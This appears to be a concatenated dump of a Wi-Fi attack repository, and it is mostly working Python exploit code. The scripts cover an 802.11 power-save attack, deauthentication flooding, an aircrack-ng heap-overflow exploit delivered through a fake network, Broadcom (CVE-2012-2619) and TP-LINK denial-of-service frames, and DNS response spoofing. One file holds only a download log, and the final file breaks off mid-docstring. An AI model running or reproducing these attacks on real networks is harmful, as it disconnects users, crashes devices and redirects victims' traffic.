20 | import signal, os 21 | from scapy.config import * 22 | from scapy.layers.dot11 import * 23 | from scapy.utils import * 24 | conf.verb=0 25 | 26 | WIFI_MTU = 2346 # 802.11 maximum frame size is 2346 bytes (RFC 3580) 27 | MAX_SN = 4096 # Max value for the 802.11 sequence number 28 | MAX_FGNUM = 16 # Max value for the 802.11 fragment number field 29 | 30 | 31 | def waitForBeacon(bssid): 32 | print "Waiting for Beacon from BSSID=[%s]" % bssid 33 | 34 | beacon = False 35 | #s = conf.L2listen() 36 | 37 | while not beacon: 38 | #p = s.recv(WIFI_MTU) 39 | p = sniff(count=1)[0] 40 | # check if beacon from the AP we want to connect to 41 | if p.haslayer(Dot11Beacon) and (p.addr3 == bssid): 42 | beacon = True 43 | cap = p.cap # AP capabilities 44 | l = p.getlayer(Dot11Elt) 45 | while l: 46 | if l.ID == 0: # SSID 47 | ssid = l.info 48 | if l.ID == 1: # rates 49 | rates = l.info 50 | l = l.payload 51 | 52 | print "Beacon from BSSID=[%s] found (has SSID=[%s])" % (bssid, ssid) 53 | 54 | #s.close() 55 | return cap, ssid, rates 56 | 57 | 58 | def extractFragN(sc): 59 | hexSC = '0' * (4 - len(hex(sc)[2:])) + hex(sc)[2:] # "normalize" to four digit hexadecimal number 60 | fgnum = int(hexSC[-1:], 16) 61 | return fgnum 62 | 63 | 64 | def extractSN(sc): 65 | hexSC = '0' * (4 - len(hex(sc)[2:])) + hex(sc)[2:] # "normalize" to four digit hexadecimal number 66 | sn = int(hexSC[:-1], 16) 67 | return sn 68 | 69 | 70 | def calculateSC(sn, fgnum = 0): 71 | if (fgnum > MAX_FGNUM): fgnum = 0 72 | if (sn > MAX_SN): sn = 0 73 | hexSN = hex(sn)[2:] + hex(fgnum)[2:] 74 | SC = int(hexSN, 16) 75 | return SC 76 | 77 | 78 | def sentPacket(p, bssid, station): 79 | ret = (p.FCfield & 0x01 == 1) and (p.addr1 == bssid) and (p.addr2 == station) # FCfield & 0x01 checks to-DS 80 | return ret 81 | 82 | 83 | def APsentPacket(p, bssid, station): 84 | # FCfield & 0x00 checks STA to STA or management or control frame 85 | ret = (p.FCfield & 0x00 == 0) and (p.addr1 == station) and (p.addr2 == bssid) and (p.addr3 == bssid) 86 | return ret 87 | 88 | 89 | def receivedPacket(p, bssid, station): 90 | ret = (p.FCfield & 0x01 == 1) and (p.addr1 == bssid) and (p.addr3 == station) # FCfield & 0x01 checks to-DS 91 | return ret 92 | 93 | 94 | def forwardedSentPacket(p, bssid, station): 95 | ret = (p.FCfield & 0x02 == 2) and (p.addr3 == station) and (p.addr2 == bssid) # FCfield & 0x02 checks from-DS 96 | return ret 97 | 98 | 99 | def forwardedReceivedPacket(p, bssid, station): 100 | ret = (p.FCfield & 0x02 == 2) and (p.addr1 == station) and (p.addr2 == bssid) # FCfield & 0x02 checks from-DS 101 | return ret 102 | 103 | 104 | def signalHandler(signum, frame): 105 | sys.exit(0) 106 | 107 | 108 | def printFrameTypes(): 109 | print "\tFrame type: reassoc | nullfunction | rts" 110 | print "\treassoc = Reassociation request frame" 111 | print "\tnullfunction = Null function (no data) frame" 112 | print "\tRTS = Request-to-send frame" 113 | print "\tprobereq = Probe request frame" 114 | 115 | 116 | def main(): 117 | if len(sys.argv) != 4 and len(sys.argv) != 5: 118 | print "Usage: %s " % sys.argv[0] 119 | printFrameTypes() 120 | sys.exit(1) 121 | 122 | conf.iface = sys.argv[1] 123 | station = sys.argv[2].lower() 124 | bssid = sys.argv[3].lower() 125 | if len(sys.argv) == 5: 126 | frameType = sys.argv[4].lower() 127 | if frameType != "reassoc" and frameType != "nullfunction" and frameType != "rts" and frameType != "probereq": 128 | print "Incorrect frame type, valid values are:" 129 | printFrameTypes() 130 | sys.exit(1) 131 | else: 132 | frameType = 'nullfunction' 133 | sn = 0 134 | fgnum = 0 135 | sc = calculateSC(sn) 136 | 137 | print "Entering main while loop, press Ctrl-C to quit" 138 | # main while loop 139 | s = conf.L2listen() 140 | 141 | #FIXME: Set duration on all frames 142 | 143 | ack = Dot11(type = 'Control', subtype = 29, addr1 = bssid, FCfield="pw-mgt") 144 | #SAVECAP:wrpcap("ack.cap", ack) 145 | 146 | if frameType == "reassoc": 147 | cap, ssid, rates = waitForBeacon(bssid) 148 | frame = Dot11(addr1 = bssid, addr2 = station, addr3 = bssid, FCfield = "to-DS+pw-mgt", SC = sc) 149 | frame = frame/Dot11ReassoReq(cap = cap, current_AP = bssid, listen_interval = 1) 150 | frame = frame/Dot11Elt(ID = 0, info = ssid) # SSID information field 151 | frame = frame/Dot11Elt(ID = 1, info = rates) # Rates information field 152 | 153 | if frameType == "nullfunction": 154 | frame = Dot11(type = 'Data', subtype = 4, addr1 = bssid, addr2 = station, addr3 = bssid, FCfield = "to-DS+pw-mgt", SC = sc, ID=20052) 155 | 156 | if frameType == "rts": 157 | frame = Dot11(type = 'Control', subtype = 11, addr1 = bssid, addr2 = station, FCfield = "to-DS+pw-mgt", SC = sc) 158 | 159 | if frameType == "probereq": 160 | cap, ssid, rates = waitForBeacon(bssid) 161 | frame = Dot11(addr1 = bssid, addr2 = station, addr3 = bssid, FCfield = "to-DS+pw-mgt", SC = sc)/Dot11ProbeReq() 162 | frame = frame/Dot11Elt(ID = 0, info = ssid) # SSID information field 163 | frame = frame/Dot11Elt(ID = 1, info = rates) # Rates information field 164 | 165 | #SAVECAP:wrpcap("frame.cap", frame) 166 | 167 | sendp(frame) 168 | print "Sent power save packet" 169 | signal.signal(signal.SIGINT, signalHandler) 170 | 171 | while True: 172 | #p = s.recv(WIFI_MTU) 173 | p = sniff(count=1)[0] 174 | if p.haslayer(Dot11) and sentPacket(p, bssid, station) and p.FCfield & 0x03 == 0: # checks to see if frame sent has power bit unset 175 | print "Station under attack is still sending packets" 176 | print p.summary() 177 | #fgnum = extractFragN(p.SC) # extracts fragment number from frame 178 | sn = extractSN(p.SC) # extracts sequence number from frame 179 | sn = (sn + 1) % MAX_SN 180 | sc = calculateSC(sn) # our frame is not fragmented (i.e. fgnum = 0) 181 | frame.SC = sc 182 | sendp(frame) 183 | print "Sent power save packet" 184 | 185 | if p.haslayer(Dot11) and forwardedSentPacket(p, bssid, station): 186 | print "Station under attack sent packets are being forwarded by the AP" 187 | print p.summary() 188 | 189 | if p.haslayer(Dot11) and receivedPacket(p, bssid, station): 190 | print "Station under attack is having packets sent to it" 191 | print p.summary() 192 | 193 | if p.haslayer(Dot11) and APsentPacket(p, bssid, station): 194 | print "Frame from AP to STA or STA to STA" 195 | print p.summary() 196 | if frameType == "probereq" and p.haslayer(Dot11ProbeResp): 197 | # We must ACK this frame as it can be a response to our Probe request 198 | print "Access point sent a Probe response, sending ACK" 199 | sendp(ack) 200 | 201 | elif frameType == "reassoc" and p.haslayer(Dot11ReassoResp): 202 | # We must ACK this frame as it can be a response to our Reassociation request 203 | print "Access point sent a Reassociation response, sending ACK" 204 | sendp(ack) 205 | 206 | if p.haslayer(Dot11) and forwardedReceivedPacket(p, bssid, station): 207 | print "Station under attack is still receiving packets (forwarded by the AP)" 208 | print p.summary() 209 | #fgnum = extractFragN(p.SC) # extracts fragment number from frame 210 | sn = extractSN(p.SC) # extracts sequence number from frame 211 | sn = (sn + 1) % MAX_SN 212 | sc = calculateSC(sn) # our frame is not fragmented (i.e. fgnum = 0) 213 | frame.SC = sc 214 | sendp(frame) 215 | print "Sent power save packet" 216 | 217 | 218 | if __name__ == "__main__": 219 | # Import Psyco if available 220 | try: 221 | import psyco 222 | psyco.full() 223 | except ImportError: 224 | pass 225 | 226 | main() 227 | -------------------------------------------------------------------------------- /deauth/scapy-deauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Scapy based wifi Deauth by @catalyst256 3 | # Change the client to FF:FF:FF:FF:FF:FF if you want a broadcasted deauth to all stations on the targeted Access Point 4 | 5 | import sys 6 | if len(sys.argv) != 5: 7 | print 'Usage is ./scapy-deauth.py interface bssid client count' 8 | print 'Example - ./scapy-deauth.py mon0 00:11:22:33:44:55 55:44:33:22:11:00 50' 9 | sys.exit(1) 10 | 11 | from scapy.all import * 12 | 13 | conf.iface = sys.argv[1] # The interface that you want to send packets out of, needs to be set to monitor mode 14 | bssid = sys.argv[2] # The BSSID of the Wireless Access Point you want to target 15 | client = sys.argv[3] # The MAC address of the Client you want to kick off the Access Point 16 | count = sys.argv[4] # The number of deauth packets you want to send 17 | 18 | conf.verb = 0 19 | 20 | packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7) 21 | 22 | for n in range(int(count)): 23 | sendp(packet) 24 | print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client 25 | 26 | -------------------------------------------------------------------------------- /exploits/aircrack-sploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF-8 -*- 3 | 4 | ''' A honeypot and remote-exploit against the aircrack-ng tools. 5 | Tested up to svn r1678. 6 | 7 | The tools' code responsible for parsing IEEE802.11-packets assumes the 8 | length of a EAPOL-packet to never exceed the maximum size of 256 bytes 9 | for packets that are part of the EAPOL-authentication. 10 | We can exploit this by letting the code parse packets which exceed the 11 | maximum size and overflow data structures allocated on the heap, 12 | possibly overwriting libc's allocation-related structures. 13 | This causes heap-corruption and a SIGSEGV or SIGABRT. 14 | 15 | Careful layout of the packet's content can even possibly alter the 16 | instruction-flow through the already well known heap-corruption paths 17 | in libc. Playing with the proclaimed length of the EAPOL-packet and the 18 | size and content of the packet's padding immediately end up in various 19 | assertion errors during calls to free(). This reveals the possibility to 20 | gain control over $EIP. 21 | 22 | Given that we have plenty of room for payload and that the tools are 23 | usually executed with root-privileges, we should be able to have a 24 | single-packet-own-everything exploit at our hands. As the attacker can 25 | cause the various tools to do memory-allocations at his will (through 26 | faking the appearance of previously unknown clients), the resulting 27 | exploit-code should have a high probability of success. 28 | 29 | The demonstration-code below requires lorcon-1, pylorcon, scapy >= 2.x 30 | and Pyrit >= 0.3.1-dev r238 to work. It uses packet injection to setup a 31 | fake IEEE802.11-network with one Access-Point and one Station. To attract 32 | people to our faked network, some data-traffic is also generated. From time 33 | to time the "Station" sends a EAPOL-confirmation to the "Access-Point" that 34 | corrupts airodump-ng's memory structures to either crash it immediately 35 | or print false information to the user (handshake is shown as if being 36 | completed). Aircrack-ng will immediately crash when trying to parse the 37 | generated dump-file as the exploit-payload overwrote the size-field of 38 | the EAPOL-packet in memory (causing aircrack-ng to compute the EAPOL-MIC 39 | over invalid memory regions). 40 | 41 | http://pyrit.wordpress.com/2010/03/31/aircrack-ng-still-vulnerable/ 42 | 43 | 44 | 03/31/2010, Lukas Lueg 45 | lukas.lueg@gmail.com 46 | http://pyrit.googlecode.com 47 | 48 | ''' 49 | 50 | from __future__ import with_statement 51 | 52 | import time 53 | import threading 54 | import cpyrit.pckttools 55 | import pylorcon 56 | import scapy.packet 57 | import scapy.fields 58 | from scapy.layers import dot11, l2 59 | 60 | 61 | class NetworkTransmitter(object): 62 | """A simple wrapper around pylorcon.Lorcon()""" 63 | 64 | def __init__(self, iface, driver='mac80211'): 65 | self.tx = pylorcon.Lorcon(iface, driver) 66 | self.tx.setfunctionalmode('INJECT') 67 | 68 | def setchannel(self, channel): 69 | self.tx.setchannel(channel) 70 | 71 | def write(self, buf): 72 | self.tx.txpacket(str(buf)) 73 | 74 | 75 | class AccessPoint(object): 76 | """A fake Access Point that makes itself known by sending beacons""" 77 | 78 | class AccessPointBeaconizer(threading.Thread): 79 | """Send beacons announcing the given ESSID, the channel and some fake 80 | rates and WPA2-information 81 | """ 82 | 83 | def __init__(self, ap): 84 | threading.Thread.__init__(self) 85 | self.ap = ap 86 | self.device = NetworkTransmitter(self.ap.iface) 87 | self.interval = 0.1 88 | self.beacon_pckt = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff', \ 89 | addr2=self.ap.bssid,\ 90 | addr3=self.ap.bssid) \ 91 | / dot11.Dot11Beacon(cap='ESS+privacy') \ 92 | / dot11.Dot11Elt(ID='SSID', \ 93 | info=self.ap.essid) \ 94 | / dot11.Dot11Elt(ID='DSset', \ 95 | info=chr(self.ap.channel)) \ 96 | / dot11.Dot11Elt(ID='Rates', \ 97 | info='\x82\x84\x0b\x16') \ 98 | / dot11.Dot11Elt(ID='RSNinfo', 99 | info='\x01\x00\x00\x0f\xac' \ 100 | '\x04\x01\x00\x00\x0f' \ 101 | '\xac\x04\x01\x00\x00' \ 102 | '\x0f\xac\x02\x00\x00') 103 | self.setDaemon(True) 104 | 105 | def run(self): 106 | while True: 107 | self.beacon_pckt.SC = self.ap.next_seq() 108 | now = time.time() - self.ap.starttime 109 | self.beacon_pckt[dot11.Dot11Beacon].timestamp = now * 1000000 110 | self.device.write(self.beacon_pckt) 111 | time.sleep(self.interval) 112 | 113 | 114 | def __init__(self, iface, bssid, essid, channel): 115 | self.channel = channel 116 | self.bssid = bssid 117 | self.essid = essid 118 | self.iface = iface 119 | self.seq = 0 120 | self.starttime = time.time() 121 | self.seq_lock = threading.Lock() 122 | self.beaconizer = self.AccessPointBeaconizer(self) 123 | self.beaconizer.start() 124 | 125 | def next_seq(self): 126 | with self.seq_lock: 127 | self.seq = (self.seq + 16) % 65535 128 | return self.seq 129 | 130 | 131 | class Aircracker(threading.Thread): 132 | """ A fake Wifi-network that includes one Access Point and one Station. 133 | The network passes around some data to attract the bees and then sends 134 | the exploit... 135 | """ 136 | 137 | def __init__(self, iface, bssid, essid, channel): 138 | threading.Thread.__init__(self) 139 | self.active = True 140 | self.device = NetworkTransmitter(iface) 141 | self.device.setchannel(channel) 142 | self.sta_mac = str(scapy.fields.RandMAC(template='00:*')) 143 | self.ap = AccessPoint(iface, bssid, essid, channel) 144 | 145 | """A dummy data-packet to generate traffic...""" 146 | self.data_pckt = dot11.Dot11(type="Data", addr1=self.sta_mac, \ 147 | addr2=bssid, addr3=bssid, \ 148 | FCfield='from-DS') \ 149 | / dot11.LLC() \ 150 | / dot11.SNAP() \ 151 | / dot11.EAPOL() \ 152 | / scapy.packet.Padding(load='a' * 100) 153 | 154 | """A IEEE802.11-packet with LLC- and SNAP-header, looking like the 155 | second phase of a EAPOL-handshake (the confirmation). The packet 156 | will cause an overflow of the "eapol"-field in struct WPA_hdsk as 157 | defined in aircrack-ng.h and set eapol_size to a bogus value 158 | (crashing the PTK-calculation), type to 0 and state to 7 (completed 159 | handshake). 160 | The last 500 dummy-bytes will crash airodump-ng. Remove those to 161 | make airodump-ng go on and aircrack-ng show a completed handshake 162 | for our fake AP. Aircrack-ng will crash while computing the PTK... 163 | """ 164 | self.xp_pckt = dot11.Dot11(addr1='00:de:ad:c0:de:00', \ 165 | addr2=self.sta_mac, FCfield='to-DS') \ 166 | / dot11.LLC() \ 167 | / dot11.SNAP() \ 168 | / l2.EAPOL() \ 169 | / cpyrit.pckttools.EAPOL_Key() \ 170 | / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo='pairwise+mic') \ 171 | / scapy.packet.Padding(load=('a' * 159) \ 172 | + '\xff\xff\xff\x0f' \ 173 | + '\x00\x00\x00\x00' \ 174 | + '\x07\x00\x00\x00' + 'a' * 300) 175 | 176 | self.setDaemon(True) 177 | 178 | def run(self): 179 | i = 0 180 | while self.active: 181 | i += 1 182 | # Send a dummy data-packet 183 | self.data_pckt.SC = self.ap.next_seq() 184 | self.device.write(self.data_pckt) 185 | if i % 10 == 0: 186 | # Send the exploit 187 | self.device.write(self.xp_pckt) 188 | time.sleep(0.1) 189 | 190 | def close(self): 191 | self.active = False 192 | self.join() 193 | 194 | 195 | if __name__ == "__main__": 196 | print "Starting faked network..." 197 | aircrk = Aircracker('mon0', '00:de:ad:c0:de:00', 'Nobody', 13) 198 | aircrk.start() 199 | print "Serving..." 200 | try: 201 | while True: 202 | time.sleep(1) 203 | except KeyboardInterrupt: 204 | pass 205 | aircrk.close() 206 | print "Done" 207 | -------------------------------------------------------------------------------- /exploits/aircrackpwn.py: -------------------------------------------------------------------------------- 1 | --2014-09-04 00:57:43-- http://downloads.securityfocus.com/vulnerabilities/exploits/39045-2.py 2 | Распознаётся downloads.securityfocus.com (downloads.securityfocus.com)… 143.127.139.111 3 | Подключение к downloads.securityfocus.com (downloads.securityfocus.com)|143.127.139.111|:80... соединение установлено. 4 | HTTP-запрос отправлен. Ожидание ответа... 200 OK 5 | Длина: 8900 (8,7K) [text/plain] 6 | Сохранение в: «39045-2.py.1» 7 | 8 | 0K ........ 100% 34,1K=0,3s 9 | 10 | 2014-09-04 00:57:44 (34,1 KB/s) - «39045-2.py.1» сохранён [8900/8900] 11 | 12 | -------------------------------------------------------------------------------- /exploits/cve-2012-2619.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # CVE : 2012-2619 3 | # Title: Broadcom DoS on BCM4325 and BCM4329 devices 4 | 5 | # Exploit Author: 6 | # CoreLabs (Core Security Technologies) 7 | # Vendor Homepage: 8 | # Software Link: [download link if available] 9 | # Version: 1.0 10 | # Tested on: 11 | # Apple iPhone 3GS 12 | # Apple iPod 2G 13 | # HTC Touch Pro 2 14 | # HTC Droid Incredible 15 | # Samsung Spica 16 | # Acer Liquid 17 | # Motorola Devour 18 | # Ford Edge (yes, it's a car) 19 | 20 | # Dispositivos afectados con el chipset BCM4329: 21 | # Apple iPhone 4 22 | # Apple iPhone 4 Verizon 23 | # Apple iPod 3G 24 | # Apple iPad Wi-Fi 25 | # Apple iPad 3G 26 | # Apple iPad 2 27 | # Apple Tv 2G 28 | # Motorola Xoom 29 | # Motorola Droid X2 30 | # Motorola Atrix 31 | # Samsung Galaxy Tab 32 | # Samsung Galaxy S 4G 33 | # Samsung Nexus S 34 | # Samsung Stratosphere 35 | # Samsung Fascinate 36 | # HTC Nexus One 37 | # HTC Evo 4G 38 | # HTC ThunderBolt 39 | # HTC Droid Incredible 2 40 | # LG Revolution 41 | # Sony Ericsson Xperia Play 42 | # Pantech Breakout 43 | # Nokia Lumina 800 44 | # Kyocera Echo 45 | # Asus Transformer Prime 46 | # Malata ZPad" 47 | 48 | 49 | import sys 50 | import time 51 | import struct 52 | import PyLorcon2 53 | 54 | def beaconFrameGenerator(): 55 | sequence = 0 56 | while(1): 57 | sequence = sequence % 4096 58 | 59 | # Frame Control 60 | frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon 61 | frame += '\x00' # Flags: 0 62 | frame += '\x00\x00' # Duration: 0 63 | frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff 64 | frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad 65 | frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad 66 | frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: 67 | #part of the generator 68 | # Frame Body 69 | frame += struct.pack('Q', time.time()) # Timestamp 70 | frame += '\x64\x00' # Beacon Interval: 0.102400 seconds 71 | frame += '\x11\x04' # Capability Information: ESS, Privacy, 72 | #Short Slot time 73 | # Information Elements 74 | # SSID: buggy 75 | frame += '\x00\x05buggy' 76 | # Supported Rates: 1,2,5.5,11,18,24,36,54 77 | frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' 78 | # DS Parameter Set: 6 79 | frame += '\x03\x01\x06' 80 | # RSN IE 81 | frame += '\x30' # ID: 48 82 | frame += '\x14' # Size: 20 83 | frame += '\x01\x00' # Version: 1 84 | frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP 85 | frame += '\x01\x00' # Pairwise cipher suite count: 1 86 | frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP 87 | frame += '\xff\xff' # Authentication suites count: 65535 88 | frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK 89 | frame += '\x00\x00' 90 | 91 | sequence += 1 92 | yield frame 93 | 94 | if __name__ == "__main__": 95 | if len(sys.argv) != 2: 96 | print "Usage:" 97 | print "\t%s " % sys.argv[0] 98 | sys.exit(-1) 99 | 100 | iface = sys.argv[1] 101 | context = PyLorcon2.Context(iface) 102 | context.open_injmon() 103 | 104 | generator = beaconFrameGenerator() 105 | 106 | for i in range(10000): 107 | frame = generator.next() 108 | time.sleep(0.100) 109 | context.send_bytes(frame) -------------------------------------------------------------------------------- /exploits/tplink_dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # TP-LINK TL-WR340G Wireless SOHO Router Denial of Service (DoS) Exploit 4 | # 5 | # === intro === 6 | # 7 | # TP-LINK TL-WR340G is a SOHO router with integrated IEEE 802.11b/g AP. 8 | # Now it's marked End-of-Life. 9 | # 10 | # Transmitting crafted frames in proximity of working router cause device 11 | # to malfunction. Wireless communication stops, existing clients don't 12 | # receive frames from AP ( except beacons ), new clients can't connect. 13 | # 14 | # 15 | # === details === 16 | # 17 | # Affected product: TL-WR340G Wireless router 18 | # Firm Version: 4.7.11 Build 101102 Rel.60376n 19 | # Hardware Version: WR340G v3 20 | # Local/remote: Local ( wirelessly ) 21 | # 22 | # Vulnerability can be spotted by crafting and transmitting frame with scapy: 23 | # Attacker could cease wireless traffic. To resume AP functionality user 24 | # must restart wireless interface in WebGUI or restart device. 25 | def tplink_dos(iface, ap_mac): 26 | fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=ap_mac,addr3=ap_mac)/Dot11Beacon()/Dot11Elt() 27 | sendp(fr, iface=iface, count=5) 28 | -------------------------------------------------------------------------------- /hopper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # 4 | 5 | __author__ = '090h' 6 | __license__ = 'GPL' 7 | 8 | # from subprocess import Popen, PIPE 9 | from threading import Thread 10 | from time import sleep 11 | from scapy.all import * 12 | import logging 13 | 14 | if LINUX: 15 | try: 16 | import PyLorcon2 17 | except ImportError: 18 | print("Please install PyLorcon2") 19 | exit(-1) 20 | 21 | 22 | class Hopper(Thread): 23 | """ 24 | Control a card and cause it to hop channels 25 | Only one card per instance 26 | """ 27 | def __init__(self, interface, wait=4): 28 | """ 29 | set the channel hopping sequence 30 | """ 31 | Thread.__init__(self) 32 | Thread.daemon = True 33 | 34 | self.wait = wait 35 | if LINUX: 36 | self.iface = PyLorcon2.Context(interface) 37 | self.iface.open_injmon() 38 | elif DARWIN: 39 | self.iface = interface 40 | else: 41 | raise NotImplemented 42 | self.HOPpause = False 43 | # dwell for 3 time slices on 1 6 11 44 | # default is 3/10 of a second 45 | # got the lists from kismet config file 46 | # thanks dragorn! 47 | self.channellist = [1, 6, 11, 14, 2, 7, 3, 8, 4, 9, 5, 10, 48 | 36, 38, 40, 42, 44, 46, 52, 56, 58, 60, 100, 104, 108, 112, 49 | 116, 120, 124, 128, 132, 136, 140, 149, 153, 157, 161, 165] 50 | self.hopList = [] 51 | self.current = 0 52 | self.check_channels() 53 | 54 | def check_channels(self): 55 | """ 56 | card drivesr suck, determine what channels 57 | a card supports before we start hopping 58 | """ 59 | # try setting 802.11ab channels first 60 | # this may not work depending on 5ghz dfs 61 | # reverse so we start with 5ghz channels first 62 | logging.debug('Gettings available channels...') 63 | for ch in self.channellist: 64 | if self.set_channel(ch, check=False): 65 | self.hopList.append(ch) 66 | logging.debug('Available channels for hopping:') 67 | logging.debug(self.hopList) 68 | 69 | def pause(self): 70 | """ 71 | Pause the channel hopping 72 | """ 73 | self.HOPpause = True 74 | 75 | def unpause(self): 76 | """ 77 | Unpause the channel hopping 78 | """ 79 | self.HOPpause = False 80 | 81 | def set_channel(self, channel, check=True): 82 | logging.debug('[*] Switching channel to %s' % channel) 83 | print('[*] Switching channel to %s' % channel) 84 | 85 | if check and channel not in self.hopList: 86 | logging.error('[!] Channel %s not inhop list' % channel) 87 | return False 88 | 89 | if LINUX: 90 | try: 91 | self.iface.set_channel(channel) 92 | except PyLorcon2.Lorcon2Exception: 93 | pass 94 | elif DARWIN: 95 | cmd = "/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport" 96 | Popen('%s -c%s' % (cmd, channel), shell=True).wait() 97 | 98 | def run(self): 99 | """ 100 | Hop channels 101 | """ 102 | while True: 103 | for ch in self.hopList: 104 | # hopping is paused though loop still runs 105 | if self.HOPpause is True: 106 | continue 107 | 108 | if not self.set_channel(ch): 109 | continue 110 | 111 | self.current = ch 112 | 113 | if ch in [1, 6, 11]: 114 | # dwell for 4/10 of a second 115 | # we want to sit on 1 6 and 11 a bit longer 116 | sleep(.5) 117 | else: 118 | sleep(.3) 119 | 120 | 121 | if __name__ == '__main__': 122 | from sys import argv 123 | logging.basicConfig(level=logging.DEBUG) 124 | Hopper(argv[1]).start() 125 | raw_input('Press enter to stop...') -------------------------------------------------------------------------------- /injmon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # 4 | # Switch 802.11 interface(s) to INJMON mode. 5 | # author: @090h 6 | # 7 | 8 | from sys import argv, exit 9 | import logging 10 | 11 | try: 12 | from PyLorcon2 import Context, auto_driver 13 | except ImportError: 14 | logging.error('PyLorcon2 not installed!') 15 | exit(-1) 16 | 17 | try: 18 | # import scapy silently 19 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 20 | from scapy.all import get_if_list, conf 21 | conf.verb = 0 22 | except ImportError: 23 | logging.error('Scapy not installed!') 24 | exit(-1) 25 | 26 | 27 | def injmon(iface=None): 28 | if iface is None: 29 | for i in get_if_list(): 30 | injmon(i) 31 | else: 32 | try: 33 | driver, description = auto_driver(iface) 34 | except: 35 | # print('Could not find driver for %s' % iface) 36 | return 37 | 38 | if iface.find('mon') != -1: 39 | print('%s is already in mon mode' % iface) 40 | return 41 | 42 | ctx = Context(iface) 43 | print('Enabling injmon on %s %s' % (iface, driver)) 44 | try: 45 | ctx.open_injmon() 46 | except: 47 | print("Failed to set injmon for %s!" % iface) 48 | 49 | 50 | if __name__ == '__main__': 51 | if len(argv) == 1: 52 | injmon() 53 | else: 54 | injmon(argv[1]) -------------------------------------------------------------------------------- /misc/dnspwn.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import time 3 | import logging 4 | 5 | logger = logging.getLogger('main') 6 | logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG) 7 | logger.setLevel(logging.DEBUG) 8 | # Set the interface for scapy to use 9 | conf.iface = 'mon0' 10 | # Set the spoofed response 11 | spoofed_ip = 'x.x.x.x' 12 | 13 | def send_response(x): 14 | req_domain = x[DNS].qd.qname 15 | logger.info('Found request for ' + req_domain) 16 | # First, we delete the existing lengths and checksums.. 17 | # We will let Scapy re-create them 18 | del(x[UDP].len) 19 | del(x[UDP].chksum) 20 | del(x[IP].len) 21 | del(x[IP].chksum) 22 | # Let's build our response from a copy of the original packet 23 | response = x.copy() 24 | # Let's work our way up the layers! 25 | # We need to start by changing our response to be "from-ds", or from the access point. 26 | response.FCfield = 2L 27 | # Switch the MAC addresses 28 | response.addr1, response.addr2 = x.addr2, x.addr1 29 | # Switch the IP addresses 30 | response.src, response.dst = x.dst, x.src 31 | # Switch the ports 32 | response.sport, response.dport = x.dport, x.sport 33 | # Set the DNS flags 34 | response[DNS].qr = 1L 35 | response[DNS].ra = 1L 36 | response[DNS].ancount = 1 37 | # Let's add on the answer section 38 | response[DNS].an = DNSRR( 39 | rrname = req_domain, 40 | type = 'A', 41 | rclass = 'IN', 42 | ttl = 900, 43 | rdata = spoofed_ip 44 | ) 45 | # Now, we inject the response! 46 | sendp(response) 47 | logger.info('Sent response: ' + req_domain + ' -> ' + spoofed_ip + '\n') 48 | 49 | def main(): 50 | logger.info('Starting to intercept [CTRL+C to stop]') 51 | sniff(prn=lambda x: send_response(x), lfilter=lambda x:x.haslayer(UDP) and x.dport == 53) 52 | 53 | if __name__ == "__main__": 54 | # Make it happen! 55 | main() -------------------------------------------------------------------------------- /misc/honeypot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF-8 -*- 3 | 4 | ''' A honeypot and remote-exploit against the aircrack-ng tools. 5 | Tested up to svn r1678. 6 | 7 | The tools' code responsible for parsing IEEE802.11-packets assumes the 8 | length of a EAPOL-packet to never exceed the maximum size of 256 bytes 9 | for packets that are part of the EAPOL-authentication. 10 | We can exploit this by letting the code parse packets which exceed the 11 | maximum size and overflow data structures allocated on the heap, 12 | possibly overwriting libc's allocation-related structures. 13 | This causes heap-corruption and a SIGSEGV or SIGABRT. 14 | 15 | Careful layout of the packet's content can even possibly alter the 16 | instruction-flow through the already well known heap-corruption paths 17 | in libc. Playing with the proclaimed length of the EAPOL-packet and the 18 | size and content of the packet's padding immediately end up in various 19 | assertion errors during calls to free(). This reveals the possibility to 20 | gain control over $EIP. 21 | 22 | Given that we have plenty of room for payload and that the tools are 23 | usually executed with root-privileges, we should be able to have a 24 | single-packet-own-everything exploit at our hands. As the attacker can 25 | cause the various tools to do memory-allocations at his will (through 26 | faking the appearance of previously unknown clients), the resulting 27 | exploit-code should have a high probability of success. 28 | 29 | The demonstration-code below requires lorcon-1, pylorcon, scapy >= 2.x 30 | and Pyrit >= 0.3.1-dev r238 to work. It uses packet injection to setup a 31 | fake IEEE802.11-network with one Access-Point and one Station. To attract 32 | people to our faked network, some data-traffic is also generated. From time 33 | to time the "Station" sends a EAPOL-confirmation to the "Access-Point" that 34 | corrupts airodump-ng's memory structures to either crash it immediately 35 | or print false information to the user (handshake is shown as if being 36 | completed). Aircrack-ng will immediately crash when trying to parse the 37 | generated dump-file as the exploit-payload overwrote the size-field of 38 | the EAPOL-packet in memory (causing aircrack-ng to compute the EAPOL-MIC 39 | over invalid memory regions). 40 